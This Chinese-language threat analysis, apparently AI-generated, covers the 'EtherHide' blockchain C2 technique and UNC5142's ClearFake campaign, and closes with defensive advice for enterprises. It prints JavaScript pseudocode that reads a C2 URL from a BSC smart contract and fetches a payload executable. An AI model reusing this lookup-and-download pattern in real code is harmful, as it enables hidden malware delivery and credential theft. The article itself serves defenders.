區塊鏈 C2 架構「EtherHide」威脅：新型態惡意程式攻擊技術分析

隨著 Web3 應用與智能合約技術的普及，資安威脅已從傳統的伺服器滲透演變為分散式帳本技術的濫用。2023 年底首度被揭露的「EtherHide」技術，標誌著惡意程式命令與控制（C2）架構的重大演進。攻擊者不再依賴易被封鎖的固定域名或 IP 位址，而是將惡意指令嵌入區塊鏈中，利用其不可篡改與去中心化的特性，建立起極難根除的隱蔽通訊鏈。本文將深入解析 EtherHide 的技術原理、攻擊鏈路、以及針對企業 IT 與資安人員的防禦建議。

EtherHide 技術原理：為何區塊鏈成為 C2 新寵？

傳統的 C2（Command and Control）架構通常依賴於攻擊者控制的域名或伺服器，資安設備（如防火牆、IDS/IPS、EDR）可以透過攔截 DNS 請求或封鎖特定 IP 來阻斷攻擊。然而，EtherHide 徹底改變了這個遊戲規則。其核心在於將惡意酬載（Payload）的存放位置或跳轉指令，寫入公有區塊鏈（如 BNB Smart Chain, BSC）的智能合約（Smart Contracts）中。

這種做法具有以下技術優勢：

不可篡改性（Immutability）： 一旦惡意指令寫入鏈上，除非合約本身設計有銷毀機制，否則資安人員無法從區塊鏈上刪除這些指令。
高隱蔽性： 惡意程式連線的對象是合法的區塊鏈節點（如透過 RPC 接口訪問），流量看起來與正常的 Web3 交易或查詢無異，傳統的域名黑名單（Domain Blacklist）完全失效。(TWCERT/CC)
動態更新： 攻擊者只需更新智能合約中的狀態，即可更換後續下載惡意程式的伺服器位址，受感染的客戶端會自動獲取最新的攻擊路徑。

UNC5142 實戰案例：ClearFake 與 EtherHide 的協作

根據 Google Threat Intelligence (Mandiant) 的追蹤，一個名為 UNC5142 的經濟動機駭客組織正頻繁利用 EtherHide 分散惡意軟體。該組織的標準攻擊流程通常結合了社交工程與區塊鏈技術，形成一條嚴密的入侵鏈：

1. 初始滲透：WordPress 漏洞利用

攻擊者首先鎖定存在已知漏洞的 WordPress 網站（如過時的外掛或佈景主題），取得網站控制權後，在合法的網頁中植入惡意的 JavaScript 程式碼。這類攻擊通常被稱為「ClearFake」。(Mandiant)

2. 社交工程誘導

當使用者訪問這些受感染的網站時，惡意腳本會偵測使用者的瀏覽器環境，並跳出偽裝成系統通知或軟體更新（如 Google Chrome 或 Microsoft Edge 更新）的假視窗。一旦使用者點擊更新，即觸發後續的惡意行為。(TWCERT/CC)

3. 鏈上指令檢索（EtherHide 階段）

不同於傳統下載器直接連向 C2 伺服器，惡意 JavaScript 會發起一個 JSON-RPC 請求，查詢 BNB Smart Chain 上的特定智能合約地址。該合約中隱藏了經過編碼的字串，解析後即為下一階段惡意酬載的真實下載網址。

4. 部署 Infostealer

根據鏈上取得的網址，惡意程式會下載並執行最終的酬載，通常是資訊竊取軟體（Infostealer），如 RedLine 或 Lumma Stealer，目標是竊取使用者的瀏覽器憑證、加密貨幣錢包以及系統敏感資訊。

技術細節：惡意指令如何隱藏在合約中？

攻擊者通常利用智能合約中的 logs 或 contract state 來存放資訊。以下是一個簡化的概念，說明惡意 JavaScript 如何與區塊鏈互動：

📂 收合（點我收起）


// 偽程式碼：惡意腳本查詢區塊鏈獲取 C2 網址
async function getC2FromBlockchain() {
    const provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed.binance.org/");
    const contractAddress = "0x...惡意合約地址...";
    const abi = ["function getC2Config() view returns (string)"];
    const contract = new ethers.Contract(contractAddress, abi, provider);
    
    // 從智能合約獲取編碼後的 C2 URL
    const encodedUrl = await contract.getC2Config();
    const realC2 = decodeBase64(encodedUrl); 
    
    // 開始下載惡意酬載
    fetch(realC2 + "/payload.exe");
}

由於 bsc-dataseed.binance.org 是合法的區塊鏈服務節點，企業內部的資安監控系統很難將此行為判定為惡意連線。

企業防禦策略與建議

面對 EtherHide 這種分散式 C2 架構，傳統的邊界防禦已顯不足。資安主管與工程師應考慮以下防禦維度：

端點監控 (EDR/XDR)： 由於網路層難以封鎖區塊鏈節點，重點應放在端點行為。監控瀏覽器進程（如 chrome.exe）是否發起異常的 PowerShell 指令或下載未經數位簽章的可執行檔。
內容安全政策 (CSP)： 對於網站管理者，應實施嚴格的 CSP 政策，限制 JavaScript 僅能與信任的網域通訊，防止第三方腳本擅自連接區塊鏈 RPC 節點。
異常流量分析： 雖然區塊鏈流量是合法的，但若非開發者或 Web3 相關企業，一般員工電腦頻繁發送 JSON-RPC 請求至區塊鏈節點（如 BSC, Polygon, Ethereum）應視為異常信號。
加強 WordPress 運維： 定期更新外掛、使用 Web Application Firewall (WAF) 攔截已知漏洞攻擊，避免企業官網成為 ClearFake 的跳板。

結論

EtherHide 的興起代表了駭客組織正在積極利用 Web3 的基礎設施來對抗傳統的資安防禦體系。這種「以鏈遮掩」的手法不僅降低了攻擊成本，更極大地延長了 C2 基礎設施的存活時間。IT 工程師與資安專業人員必須意識到，未來的威脅將不再侷限於傳統互聯網協定，理解區塊鏈運作原理並將其納入威脅建模（Threat Modeling）中，將是維持企業資安韌性的關鍵。

MITRE ATT&CK 對應

T1584.005 – Compromise Infrastructure: Botnet (利用受感染網站)
T1102.003 – Web Service: One-Way Communication (利用區塊鏈作為中繼)
T1204.002 – User Execution: Malicious File (誘導使用者點擊更新)
T1568 – Dynamic Resolution (透過智能合約動態解析 C2)

參考資料與原文來源

新興區塊鏈 C2 威脅浮現，「EtherHide」成駭客新寵 – TWCERT/CC (2025-11-27)
UNC5142 Leverages EtherHiding to Distribute Malware – Google Threat Intelligence / Mandiant (2024)
TWCERT/CC 資安情資電子報 2025 年 11 月份 – TWCERT/CC
台灣資安新聞彙整 2025.11.26-12.02 – HENNGE

🧠本文由 DreamJ AI 技術新聞生成系統 自動撰寫並進行語意優化，僅供技術研究與教學使用。
請以原廠公告、CVE 官方資料與安全建議為最終依據。